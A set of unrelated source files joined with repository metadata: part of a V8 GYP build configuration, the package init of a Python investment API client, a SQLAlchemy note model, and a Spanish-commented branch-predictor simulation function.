'mips64/macro-assembler-mips64.h',
'mips64/simulator-mips64.cc',
'mips64/simulator-mips64.h',
'builtins/mips64/builtins-mips64.cc',
'compiler/mips64/code-generator-mips64.cc',
'compiler/mips64/instruction-codes-mips64.h',
'compiler/mips64/instruction-scheduler-mips64.cc',
'compiler/mips64/instruction-selector-mips64.cc',
'crankshaft/mips64/lithium-codegen-mips64.cc',
'crankshaft/mips64/lithium-codegen-mips64.h',
'crankshaft/mips64/lithium-gap-resolver-mips64.cc',
'crankshaft/mips64/lithium-gap-resolver-mips64.h',
'crankshaft/mips64/lithium-mips64.cc',
'crankshaft/mips64/lithium-mips64.h',
'debug/mips64/debug-mips64.cc',
'full-codegen/mips64/full-codegen-mips64.cc',
'ic/mips64/access-compiler-mips64.cc',
'ic/mips64/handler-compiler-mips64.cc',
'ic/mips64/ic-mips64.cc',
'regexp/mips64/regexp-macro-assembler-mips64.cc',
'regexp/mips64/regexp-macro-assembler-mips64.h',
],
}],
['v8_target_arch=="x64"', {
'sources': [ ### gcmole(arch:x64) ###
'builtins/x64/builtins-x64.cc',
'compiler/x64/code-generator-x64.cc',
'compiler/x64/instruction-codes-x64.h',
'compiler/x64/instruction-scheduler-x64.cc',
'compiler/x64/instruction-selector-x64.cc',
'compiler/x64/unwinding-info-writer-x64.h',
'compiler/x64/unwinding-info-writer-x64.cc',
'crankshaft/x64/lithium-codegen-x64.cc',
'crankshaft/x64/lithium-codegen-x64.h',
'crankshaft/x64/lithium-gap-resolver-x64.cc',
'crankshaft/x64/lithium-gap-resolver-x64.h',
'crankshaft/x64/lithium-x64.cc',
'crankshaft/x64/lithium-x64.h',
'x64/assembler-x64-inl.h',
'x64/assembler-x64.cc',
'x64/assembler-x64.h',
'x64/code-stubs-x64.cc',
'x64/code-stubs-x64.h',
'x64/codegen-x64.cc',
'x64/codegen-x64.h',
'x64/cpu-x64.cc',
'x64/deoptimizer-x64.cc',
'x64/disasm-x64.cc',
'x64/eh-frame-x64.cc',
'x64/frames-x64.cc',
'x64/frames-x64.h',
'x64/interface-descriptors-x64.cc',
'x64/macro-assembler-x64.cc',
'x64/macro-assembler-x64.h',
'x64/simulator-x64.cc',
'x64/simulator-x64.h',
'x64/sse-instr.h',
'debug/x64/debug-x64.cc',
'full-codegen/x64/full-codegen-x64.cc',
'ic/x64/access-compiler-x64.cc',
'ic/x64/handler-compiler-x64.cc',
'ic/x64/ic-x64.cc',
'regexp/x64/regexp-macro-assembler-x64.cc',
'regexp/x64/regexp-macro-assembler-x64.h',
'third_party/valgrind/valgrind.h',
],
}],
['v8_target_arch=="x64" and OS=="linux"', {
'sources': ['trap-handler/handler-inside.cc']
}],
['v8_target_arch=="ppc" or v8_target_arch=="ppc64"', {
'sources': [ ### gcmole(arch:ppc) ###
'builtins/ppc/builtins-ppc.cc',
'compiler/ppc/code-generator-ppc.cc',
'compiler/ppc/instruction-codes-ppc.h',
'compiler/ppc/instruction-scheduler-ppc.cc',
'compiler/ppc/instruction-selector-ppc.cc',
'crankshaft/ppc/lithium-ppc.cc',
'crankshaft/ppc/lithium-ppc.h',
'crankshaft/ppc/lithium-codegen-ppc.cc',
'crankshaft/ppc/lithium-codegen-ppc.h',
'crankshaft/ppc/lithium-gap-resolver-ppc.cc',
'crankshaft/ppc/lithium-gap-resolver-ppc.h',
'debug/ppc/debug-ppc.cc',
'full-codegen/ppc/full-codegen-ppc.cc',
'ic/ppc/access-compiler-ppc.cc',
'ic/ppc/handler-compiler-ppc.cc',
'ic/ppc/ic-ppc.cc',
'ppc/assembler-ppc-inl.h',
'ppc/assembler-ppc.cc',
'ppc/assembler-ppc.h',
'ppc/code-stubs-ppc.cc',
'ppc/code-stubs-ppc.h',
'ppc/codegen-ppc.cc',
'ppc/codegen-ppc.h',
'ppc/constants-ppc.h',
'ppc/constants-ppc.cc',
'ppc/cpu-ppc.cc',
'ppc/deoptimizer-ppc.cc',
'ppc/disasm-ppc.cc',
'ppc/frames-ppc.cc',
'ppc/frames-ppc.h',
'ppc/interface-descriptors-ppc.cc',
'ppc/macro-assembler-ppc.cc',
'ppc/macro-assembler-ppc.h',
'ppc/simulator-ppc.cc',
'ppc/simulator-ppc.h',
'regexp/ppc/regexp-macro-assembler-ppc.cc',
'regexp/ppc/regexp-macro-assembler-ppc.h',
],
}],
['v8_target_arch=="s390" or v8_target_arch=="s390x"', {
'sources': [ ### gcmole(arch:s390) ###
'builtins/s390/builtins-s390.cc',
'compiler/s390/code-generator-s390.cc',
'compiler/s390/instruction-codes-s390.h',
'compiler/s390/instruction-scheduler-s390.cc',
'compiler/s390/instruction-selector-s390.cc',
'crankshaft/s390/lithium-codegen-s390.cc',
'crankshaft/s390/lithium-codegen-s390.h',
'crankshaft/s390/lithium-gap-resolver-s390.cc',
'crankshaft/s390/lithium-gap-resolver-s390.h',
'crankshaft/s390/lithium-s390.cc',
'crankshaft/s390/lithium-s390.h',
'debug/s390/debug-s390.cc',
'full-codegen/s390/full-codegen-s390.cc',
'ic/s390/access-compiler-s390.cc',
'ic/s390/handler-compiler-s390.cc',
'ic/s390/ic-s390.cc',
'regexp/s390/regexp-macro-assembler-s390.cc',
'regexp/s390/regexp-macro-assembler-s390.h',
's390/assembler-s390.cc',
's390/assembler-s390.h',
's390/assembler-s390-inl.h',
's390/codegen-s390.cc',
's390/codegen-s390.h',
's390/code-stubs-s390.cc',
's390/code-stubs-s390.h',
's390/constants-s390.cc',
's390/constants-s390.h',
's390/cpu-s390.cc',
's390/deoptimizer-s390.cc',
's390/disasm-s390.cc',
's390/frames-s390.cc',
's390/frames-s390.h',
's390/interface-descriptors-s390.cc',
's390/macro-assembler-s390.cc',
's390/macro-assembler-s390.h',
's390/simulator-s390.cc',
's390/simulator-s390.h',
],
}],
['OS=="win"', {
'variables': {
'gyp_generators': '<!(echo $GYP_GENERATORS)',
},
'msvs_disabled_warnings': [4351, 4355, 4800],
# When building Official, the .lib is too large and exceeds the 2G
# limit. This breaks it into multiple pieces to avoid the limit.
# See http://crbug.com/485155.
'msvs_shard': 4,
}],
['component=="shared_library"', {
'defines': [
'BUILDING_V8_SHARED',
],
}],
['v8_postmortem_support=="true"', {
'sources': [
'<(SHARED_INTERMEDIATE_DIR)/debug-support.cc',
]
}],
['v8_enable_i18n_support==1', {
'dependencies': [
'<(icu_gyp_path):icui18n',
'<(icu_gyp_path):icuuc',
],
'conditions': [
['icu_use_data_file_flag==1', {
'defines': ['ICU_UTIL_DATA_IMPL=ICU_UTIL_DATA_FILE'],
}, { # else icu_use_data_file_flag !=1
'conditions': [
['OS=="win"', {
'defines': ['ICU_UTIL_DATA_IMPL=ICU_UTIL_DATA_SHARED'],
}, {
'defines': ['ICU_UTIL_DATA_IMPL=ICU_UTIL_DATA_STATIC'],
}],
],
}],
],
}, { # v8_enable_i18n_support==0
'sources!': [
'builtins/builtins-intl.cc',
'intl.cc',
'intl.h',
'objects/intl-objects.cc',
'objects/intl-objects-inl.h',
'objects/intl-objects.h',
'runtime/runtime-intl.cc',
],
}],
['OS=="win" and v8_enable_i18n_support==1', {
'dependencies': [
'<(icu_gyp_path):icudata',
],
}],
],
},
{
'target_name': 'v8_libbase',
'type': '<(component)',
'variables': {
'optimize': 'max',
},
'include_dirs+': [
'..',
],
'sources': [
'base/adapters.h',
'base/atomic-utils.h',
'base/atomicops.h',
'base/atomicops_internals_atomicword_compat.h',
'base/atomicops_internals_portable.h',
'base/atomicops_internals_x86_msvc.h',
'base/base-export.h',
'base/bits.cc',
'base/bits.h',
'base/build_config.h',
'base/compiler-specific.h',
'base/cpu.cc',
'base/cpu.h',
'base/division-by-constant.cc',
'base/division-by-constant.h',
'base/debug/stack_trace.cc',
'base/debug/stack_trace.h',
'base/file-utils.cc',
'base/file-utils.h',
'base/flags.h',
'base/format-macros.h',
'base/free_deleter.h',
'base/functional.cc',
'base/functional.h',
'base/hashmap.h',
'base/hashmap-entry.h',
'base/ieee754.cc',
'base/ieee754.h',
'base/iterator.h',
'base/lazy-instance.h',
'base/logging.cc',
'base/logging.h',
'base/macros.h',
'base/once.cc',
'base/once.h',
'base/platform/elapsed-timer.h',
'base/platform/time.cc',
'base/platform/time.h',
'base/platform/condition-variable.cc',
'base/platform/condition-variable.h',
'base/platform/mutex.cc',
'base/platform/mutex.h',
'base/platform/platform.h',
'base/platform/semaphore.cc',
'base/platform/semaphore.h',
'base/ring-buffer.h',
'base/safe_conversions.h',
'base/safe_conversions_impl.h',
'base/safe_math.h',
'base/safe_math_impl.h',
'base/sys-info.cc',
'base/sys-info.h',
'base/timezone-cache.h',
'base/utils/random-number-generator.cc',
'base/utils/random-number-generator.h',
],
'target_conditions': [
['OS=="android" and _toolset=="target"', {
'libraries': [
'-llog',
],
'include_dirs': [
'src/common/android/include',
],
}],
],
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
['component=="shared_library"', {
'defines': [
'BUILDING_V8_BASE_SHARED',
],
'direct_dependent_settings': {
'defines': [
'USING_V8_BASE_SHARED',
],
},
}],
['OS=="linux"', {
'link_settings': {
'libraries': [
'-ldl',
'-lrt'
],
},
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-linux.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
],
}
],
['OS=="android"', {
'sources': [
'base/debug/stack_trace_android.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
],
'link_settings': {
'target_conditions': [
['_toolset=="host" and host_os!="mac"', {
# Only include libdl and librt on host builds because they
# are included by default on Android target builds, and we
# don't want to re-include them here since this will change
# library order and break (see crbug.com/469973).
# These libraries do not exist on Mac hosted builds.
'libraries': [
'-ldl',
'-lrt'
]
}]
]
},
'conditions': [
['host_os=="mac"', {
'target_conditions': [
['_toolset=="host"', {
'sources': [
'base/platform/platform-macos.cc'
]
}, {
'sources': [
'base/platform/platform-linux.cc'
]
}],
],
}, {
'sources': [
'base/platform/platform-linux.cc'
]
}],
],
},
],
['OS=="qnx"', {
'link_settings': {
'target_conditions': [
['_toolset=="host" and host_os=="linux"', {
'libraries': [
'-lrt'
],
}],
['_toolset=="target"', {
'libraries': [
'-lbacktrace'
],
}],
],
},
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
'base/qnx-math.h'
],
'target_conditions': [
['_toolset=="host" and host_os=="linux"', {
'sources': [
'base/platform/platform-linux.cc'
],
}],
['_toolset=="host" and host_os=="mac"', {
'sources': [
'base/platform/platform-macos.cc'
],
}],
['_toolset=="target"', {
'sources': [
'base/platform/platform-qnx.cc'
],
}],
],
},
],
['OS=="freebsd"', {
'link_settings': {
'libraries': [
'-L/usr/local/lib -lexecinfo',
]},
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-freebsd.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
],
}
],
['OS=="openbsd"', {
'link_settings': {
'libraries': [
'-L/usr/local/lib -lexecinfo',
]},
'sources': [
'base/platform/platform-openbsd.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc'
],
}
],
['OS=="netbsd"', {
'link_settings': {
'libraries': [
'-L/usr/pkg/lib -Wl,-R/usr/pkg/lib -lexecinfo',
]},
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-openbsd.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
],
}
],
['OS=="aix"', {
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-aix.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc'
]},
],
['OS=="solaris"', {
'link_settings': {
'libraries': [
'-lnsl -lrt',
]},
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-solaris.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
],
}
],
['OS=="mac"', {
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-macos.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
]},
],
['OS=="win"', {
'defines': [
'_CRT_RAND_S' # for rand_s()
],
'variables': {
'gyp_generators': '<!(echo $GYP_GENERATORS)',
},
'conditions': [
['gyp_generators=="make"', {
'variables': {
'build_env': '<!(uname -o)',
},
'conditions': [
['build_env=="Cygwin"', {
'sources': [
'base/debug/stack_trace_posix.cc',
'base/platform/platform-cygwin.cc',
'base/platform/platform-posix.h',
'base/platform/platform-posix.cc',
],
}, {
'sources': [
'base/debug/stack_trace_win.cc',
'base/platform/platform-win32.cc',
'base/win32-headers.h',
],
}],
],
'link_settings': {
'libraries': [ '-lwinmm', '-lws2_32' ],
},
}, {
'sources': [
'base/debug/stack_trace_win.cc',
'base/platform/platform-win32.cc',
'base/win32-headers.h',
],
'msvs_disabled_warnings': [4351, 4355, 4800],
'link_settings': {
'libraries': [
'-ldbghelp.lib',
'-lshlwapi.lib',
'-lwinmm.lib',
'-lws2_32.lib'
],
},
}],
],
}],
],
},
{
'target_name': 'v8_libplatform',
'type': '<(component)',
'variables': {
'optimize': 'max',
},
'dependencies': [
'v8_libbase',
],
'include_dirs+': [
'..',
'<(DEPTH)',
'../include',
],
'sources': [
'../include/libplatform/libplatform.h',
'../include/libplatform/libplatform-export.h',
'../include/libplatform/v8-tracing.h',
'libplatform/default-platform.cc',
'libplatform/default-platform.h',
'libplatform/task-queue.cc',
'libplatform/task-queue.h',
'libplatform/tracing/trace-buffer.cc',
'libplatform/tracing/trace-buffer.h',
'libplatform/tracing/trace-config.cc',
'libplatform/tracing/trace-object.cc',
'libplatform/tracing/trace-writer.cc',
'libplatform/tracing/trace-writer.h',
'libplatform/tracing/tracing-controller.cc',
'libplatform/worker-thread.cc',
'libplatform/worker-thread.h',
],
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
['component=="shared_library"', {
'direct_dependent_settings': {
'defines': [ 'USING_V8_PLATFORM_SHARED' ],
},
'defines': [ 'BUILDING_V8_PLATFORM_SHARED' ],
}]
],
'direct_dependent_settings': {
'include_dirs': [
'../include',
],
},
},
{
'target_name': 'v8_libsampler',
'type': 'static_library',
'variables': {
'optimize': 'max',
},
'dependencies': [
'v8_libbase',
],
'include_dirs+': [
'..',
'../include',
],
'sources': [
'libsampler/sampler.cc',
'libsampler/sampler.h'
],
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
],
'direct_dependent_settings': {
'include_dirs': [
'../include',
],
},
},
{
'target_name': 'natives_blob',
'type': 'none',
'conditions': [
[ 'v8_use_external_startup_data==1', {
'conditions': [
['want_separate_host_toolset==1', {
'dependencies': ['js2c#host'],
}, {
'dependencies': ['js2c'],
}],
],
'actions': [{
'action_name': 'concatenate_natives_blob',
'inputs': [
'../tools/concatenate-files.py',
'<(SHARED_INTERMEDIATE_DIR)/libraries.bin',
'<(SHARED_INTERMEDIATE_DIR)/libraries-extras.bin',
'<(SHARED_INTERMEDIATE_DIR)/libraries-experimental-extras.bin',
],
'conditions': [
['want_separate_host_toolset==1', {
'target_conditions': [
['_toolset=="host"', {
'outputs': [
'<(PRODUCT_DIR)/natives_blob_host.bin',
],
'action': [
'python', '<@(_inputs)', '<(PRODUCT_DIR)/natives_blob_host.bin'
],
}, {
'outputs': [
'<(PRODUCT_DIR)/natives_blob.bin',
],
'action': [
'python', '<@(_inputs)', '<(PRODUCT_DIR)/natives_blob.bin'
],
}],
],
}, {
'outputs': [
'<(PRODUCT_DIR)/natives_blob.bin',
],
'action': [
'python', '<@(_inputs)', '<(PRODUCT_DIR)/natives_blob.bin'
],
}],
],
}],
}],
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
]
},
{
'target_name': 'js2c',
'type': 'none',
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host'],
}, {
'toolsets': ['target'],
}],
],
'variables': {
'library_files': [
'js/macros.py',
'messages.h',
'js/prologue.js',
'js/max-min.js',
'js/v8natives.js',
'js/array.js',
'js/string.js',
'js/typedarray.js',
'js/collection.js',
'js/weak-collection.js',
'js/collection-iterator.js',
'js/promise.js',
'js/messages.js',
'js/templates.js',
'js/spread.js',
'js/proxy.js',
'debug/mirrors.js',
'debug/debug.js',
'debug/liveedit.js',
],
'libraries_bin_file': '<(SHARED_INTERMEDIATE_DIR)/libraries.bin',
'libraries_extras_bin_file': '<(SHARED_INTERMEDIATE_DIR)/libraries-extras.bin',
'libraries_experimental_extras_bin_file': '<(SHARED_INTERMEDIATE_DIR)/libraries-experimental-extras.bin',
'conditions': [
['v8_enable_i18n_support==1', {
'library_files': ['js/intl.js'],
}],
],
},
'actions': [
{
'action_name': 'js2c',
'inputs': [
'../tools/js2c.py',
'<@(library_files)',
],
'outputs': ['<(SHARED_INTERMEDIATE_DIR)/libraries.cc'],
'action': [
'python',
'../tools/js2c.py',
'<(SHARED_INTERMEDIATE_DIR)/libraries.cc',
'CORE',
'<@(library_files)',
],
},
{
'action_name': 'js2c_bin',
'inputs': [
'../tools/js2c.py',
'<@(library_files)',
],
'outputs': ['<@(libraries_bin_file)'],
'action': [
'python',
'../tools/js2c.py',
'<(SHARED_INTERMEDIATE_DIR)/libraries.cc',
'CORE',
'<@(library_files)',
'--startup_blob', '<@(libraries_bin_file)',
'--nojs',
],
},
{
'action_name': 'js2c_extras',
'inputs': [
'../tools/js2c.py',
'<@(v8_extra_library_files)',
],
'outputs': ['<(SHARED_INTERMEDIATE_DIR)/extras-libraries.cc'],
'action': [
'python',
'../tools/js2c.py',
'<(SHARED_INTERMEDIATE_DIR)/extras-libraries.cc',
'EXTRAS',
'<@(v8_extra_library_files)',
],
},
{
'action_name': 'js2c_extras_bin',
'inputs': [
'../tools/js2c.py',
'<@(v8_extra_library_files)',
],
'outputs': ['<@(libraries_extras_bin_file)'],
'action': [
'python',
'../tools/js2c.py',
'<(SHARED_INTERMEDIATE_DIR)/extras-libraries.cc',
'EXTRAS',
'<@(v8_extra_library_files)',
'--startup_blob', '<@(libraries_extras_bin_file)',
'--nojs',
],
},
{
'action_name': 'js2c_experimental_extras',
'inputs': [
'../tools/js2c.py',
'<@(v8_experimental_extra_library_files)',
],
'outputs': [
'<(SHARED_INTERMEDIATE_DIR)/experimental-extras-libraries.cc',
],
'action': [
'python',
'../tools/js2c.py',
'<(SHARED_INTERMEDIATE_DIR)/experimental-extras-libraries.cc',
'EXPERIMENTAL_EXTRAS',
'<@(v8_experimental_extra_library_files)',
],
},
{
'action_name': 'js2c_experimental_extras_bin',
'inputs': [
'../tools/js2c.py',
'<@(v8_experimental_extra_library_files)',
],
'outputs': ['<@(libraries_experimental_extras_bin_file)'],
'action': [
'python',
'../tools/js2c.py',
'<(SHARED_INTERMEDIATE_DIR)/experimental-extras-libraries.cc',
'EXPERIMENTAL_EXTRAS',
'<@(v8_experimental_extra_library_files)',
'--startup_blob', '<@(libraries_experimental_extras_bin_file)',
'--nojs',
],
},
],
},
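    # A hedged illustration (command shape inferred from the inputs/outputs
    # above, so treat it as an approximation): the 'js2c' action amounts to
    #   python ../tools/js2c.py <gen>/libraries.cc CORE js/macros.py ... debug/liveedit.js
    # and the '*_bin' variants append '--startup_blob <blob>.bin --nojs' so only
    # the binary startup blob is written instead of the generated C++ source.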
{
'target_name': 'postmortem-metadata',
'type': 'none',
'variables': {
'heapobject_files': [
'objects.h',
'objects-inl.h',
],
},
'actions': [
{
'action_name': 'gen-postmortem-metadata',
'inputs': [
'../tools/gen-postmortem-metadata.py',
'<@(heapobject_files)',
],
'outputs': [
'<(SHARED_INTERMEDIATE_DIR)/debug-support.cc',
],
'action': [
'python',
'../tools/gen-postmortem-metadata.py',
'<@(_outputs)',
'<@(heapobject_files)'
]
}
]
},
{
'target_name': 'mksnapshot',
'type': 'executable',
'dependencies': [
'v8_base',
'v8_libbase',
'v8_nosnapshot',
'v8_libplatform'
],
'include_dirs+': [
'..',
'<(DEPTH)',
],
'sources': [
'snapshot/mksnapshot.cc',
],
'conditions': [
['v8_enable_i18n_support==1', {
'dependencies': [
'<(icu_gyp_path):icui18n',
'<(icu_gyp_path):icuuc',
]
}],
['want_separate_host_toolset==1', {
'toolsets': ['host'],
}, {
'toolsets': ['target'],
}],
],
},
],
}
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
919c64dbe119b1936ebd0513a95f570f70ef90a3
|
a1211018020bb564921e080c84063de275d0464b
|
/tinvest/__init__.py
|
3d9dd21ce1f65d685ea70fbaf556d524eb31ff79
|
[] |
no_license
|
pkosukhin/tinvest
|
3e0b30360c4f3f0a8710b8e7f79ec014182714f3
|
159a2dcb1aa6a23d64d3680f923c333a9e3add97
|
refs/heads/master
| 2022-04-19T05:37:25.304982
| 2020-04-06T14:36:21
| 2020-04-06T14:36:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,176
|
py
|
from .apis import MarketApi, OperationsApi, OrdersApi, PortfolioApi, SandboxApi, UserApi
from .async_client import AsyncClient
from .shemas import (  # NB: 'shemas' (sic) is this package's actual module name
BrokerAccountType,
Candle,
CandleResolution,
Candles,
CandlesResponse,
CandleStreamingSchema,
Currencies,
Currency,
CurrencyPosition,
Empty,
Error,
ErrorStreamingSchema,
InstrumentInfoStreamingSchema,
InstrumentType,
LimitOrderRequest,
LimitOrderResponse,
MarketInstrument,
MarketInstrumentList,
MarketInstrumentListResponse,
MarketInstrumentResponse,
MarketOrderRequest,
MarketOrderResponse,
MoneyAmount,
Operation,
Operations,
OperationsResponse,
OperationStatus,
OperationTrade,
OperationType,
OperationTypeWithCommission,
Order,
Orderbook,
OrderbookResponse,
OrderbookStreamingSchema,
OrderResponse,
OrdersResponse,
OrderStatus,
OrderType,
PlacedLimitOrder,
PlacedMarketOrder,
Portfolio,
PortfolioCurrenciesResponse,
PortfolioPosition,
PortfolioResponse,
SandboxAccount,
SandboxCurrency,
SandboxRegisterRequest,
SandboxRegisterResponse,
SandboxSetCurrencyBalanceRequest,
SandboxSetPositionBalanceRequest,
SearchMarketInstrument,
SearchMarketInstrumentResponse,
TradeStatus,
UserAccount,
UserAccounts,
UserAccountsResponse,
)
from .streaming import Streaming, StreamingApi, StreamingEvents
from .sync_client import SyncClient
__all__ = (
# Http Clients
'AsyncClient',
'SyncClient',
# Streaming
'Streaming',
'StreamingApi',
'StreamingEvents',
# Streaming Schemas
'CandleStreamingSchema',
'ErrorStreamingSchema',
'InstrumentInfoStreamingSchema',
'OrderbookStreamingSchema',
# API Clients
'MarketApi',
'OperationsApi',
'OrdersApi',
'PortfolioApi',
'SandboxApi',
'UserApi',
# Schemas
'BrokerAccountType',
'Candle',
'CandleResolution',
'Candles',
'CandlesResponse',
'Currencies',
'Currency',
'CurrencyPosition',
'Empty',
'Error',
'InstrumentType',
'LimitOrderRequest',
'LimitOrderResponse',
'MarketInstrument',
'MarketInstrumentList',
'MarketInstrumentListResponse',
'MarketInstrumentResponse',
'MoneyAmount',
'MarketOrderRequest',
'MarketOrderResponse',
'Operation',
'OperationStatus',
'OperationTrade',
'OperationType',
'OperationTypeWithCommission',
'Operations',
'OperationsResponse',
'Order',
'OrderResponse',
'OrderStatus',
'OrderType',
'Orderbook',
'OrderbookResponse',
'OrdersResponse',
'PlacedLimitOrder',
'Portfolio',
'PortfolioCurrenciesResponse',
'PortfolioPosition',
'PortfolioResponse',
'PlacedMarketOrder',
'SandboxAccount',
'SandboxCurrency',
'SandboxSetCurrencyBalanceRequest',
'SandboxSetPositionBalanceRequest',
'SandboxRegisterRequest',
'SandboxRegisterResponse',
'SearchMarketInstrument',
'SearchMarketInstrumentResponse',
'TradeStatus',
'UserAccount',
'UserAccounts',
'UserAccountsResponse',
)
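# A hedged usage sketch. Only the names exported above are confirmed by this
# module; the constructor arguments and method names below are illustrative
# assumptions, so treat it as pseudocode rather than the package's real API:
#
#   from tinvest import SyncClient, MarketApi
#   client = SyncClient('MY_TOKEN')        # token argument is an assumption
#   market = MarketApi(client)             # wiring is an assumption
#   stocks = market.market_stocks_get()    # hypothetical method name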
|
[
"daxartio@gmail.com"
] |
daxartio@gmail.com
|
3e9013d7774a42b2270147ac9583d70b9910f672
|
eac64fef132f7c463a9494fbbe0a058fffe1ad9d
|
/backend/app/app/database/models/note.py
|
69dc7275bed47ca017c2d1673517086c9df764a2
|
[
"MIT"
] |
permissive
|
bigSAS/fast-api-backend-starter
|
cdc7491a8275904597a3de53be14a4ea9d6e1779
|
21d92632e9c9668de461dd7f40156ae098765242
|
refs/heads/main
| 2023-05-30T23:44:18.334266
| 2021-07-10T08:46:15
| 2021-07-10T08:46:15
| 376,557,928
| 1
| 0
| null | 2021-07-08T17:35:32
| 2021-06-13T14:01:35
|
Python
|
UTF-8
|
Python
| false
| false
| 381
|
py
|
from sqlalchemy import Column, String, Integer, ForeignKey
from app.database.setup import Base
class Note(Base):
"""
Note entity. Import as NoteEntity.
"""
__tablename__ = "notes"
id = Column(Integer, primary_key=True, index=True)
title = Column(String, index=True)
description = Column(String)
owner_id = Column(Integer, ForeignKey("users.id"))
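# A self-contained persistence sketch (assumption: an in-memory SQLite engine
# rather than this project's real database setup; creating the FK target
# requires the User model to be imported as well):
#
#   from sqlalchemy import create_engine
#   from sqlalchemy.orm import sessionmaker
#   engine = create_engine("sqlite:///:memory:")
#   Base.metadata.create_all(engine)
#   session = sessionmaker(bind=engine)()
#   session.add(Note(title="todo", description="write docs", owner_id=1))
#   session.commit()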
|
[
"sas.it.tomasz.majk@gmail.com"
] |
sas.it.tomasz.majk@gmail.com
|
32144e02682e87842d8d9e9d29e676dbf1182049
|
e196d0b8407fc69b5a50e88d457c1f613e1f2a8c
|
/tarea1_estructuras-de-compus_ii-master/Aux1.py
|
e9d4ed6fc5d57d12f0d97024f5d1756b5eddbd77
|
[] |
no_license
|
Marlon-Lazo-Coronado/Estructuras_Compus_II
|
8f4a85f4290af55453a9c0160d13e64add722ee6
|
7fa7a8d69fb52bfcd045fec4c270dfe4ccb7a33e
|
refs/heads/main
| 2023-06-29T23:26:37.269396
| 2021-08-04T02:45:02
| 2021-08-04T02:45:02
| 392,504,625
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,163
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
def Aux11(state,a,line,Xhistoria,BHT,PHT):
bandera=0
#print(C)
#len(C)
    paso=0
    if paso==0:  # always true: paso is never modified
        error = line[11]  # space here means the address field is 11 digits long
if error == " ":
t=int(line[0:11])
else:
t=int(line[0:10])
        p = t & ((2**a)-1)  # Mask keeping the low a bits of the address
#print(bin(p))
#print(p)
#print(line)
        # All possible state-transition cases are enumerated below; the logic
        # appears twice because the address field is sometimes 10 and
        # sometimes 11 characters long.
        # Update the history and state tables
historia = PHT[p]
#print(historia)
direccion = historia ^ p
temp=BHT[direccion]
state=BHT[direccion]
        # Address field is 10 digits: the outcome flag sits at index 11
        if line[10] == " ": # Branches not taken
if ((temp == 0) & (line[11]=="N")):
                # Shift the history register
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=1
if ((temp == 1) & (line[11]=="N")):
state = state - 1
BHT[direccion] = state
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=1
if ((temp == 2) & (line[11]=="N")):
state = state - 1
BHT[direccion] = state
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=0
if ((temp == 3) & (line[11]=="N")):
state = state - 1
BHT[direccion] = state
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=0
            # Branches taken
if ((temp == 0) & (line[11]=="T")):
state = state + 1
BHT[direccion] = state
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=0
if ((temp == 1) & (line[11]=="T")):
state = state + 1
BHT[direccion] = state
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=0
if ((temp == 2) & (line[11]=="T")):
state = state + 1
BHT[direccion] = state
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=1
if ((temp == 3) & (line[11]=="T")):
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=1
        # Address field is 11 digits: the outcome flag sits at index 10
        else: # Branches not taken
if ((temp == 0) & (line[10]=="N")):
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=1
if ((temp == 1) & (line[10]=="N")):
state = state - 1
BHT[direccion] = state
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=1
if ((temp == 2) & (line[10]=="N")):
state = state - 1
BHT[direccion] = state
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=0
if ((temp == 3) & (line[10]=="N")):
state = state - 1
BHT[direccion] = state
PHT[p] = ((historia << 1) & (Xhistoria))
bandera=0
            # Branches taken
if ((temp == 0) & (line[10]=="T")):
state = state + 1
BHT[direccion] = state
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=0
if ((temp == 1) & (line[10]=="T")):
state = state + 1
BHT[direccion] = state
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=0
if ((temp == 2) & (line[10]=="T")):
state = state + 1
BHT[direccion] = state
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=1
if ((temp == 3) & (line[10]=="T")):
PHT[p] = (((historia << 1) & (Xhistoria)) | 1)
bandera=1
return bandera
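# A hedged driver sketch (table sizes and the trace format are assumptions
# inferred from the slicing above: a 10- or 11-digit address, a space, then a
# T/N outcome; Aux11 returns 1 when the 2-bit counter predicted correctly):
#
#   a = 4                                # history/index width in bits
#   Xhistoria = (1 << a) - 1             # mask keeping `a` history bits
#   PHT = [0] * (2 ** a)                 # per-address history registers
#   BHT = [0] * (2 ** a)                 # 2-bit saturating counters (0..3)
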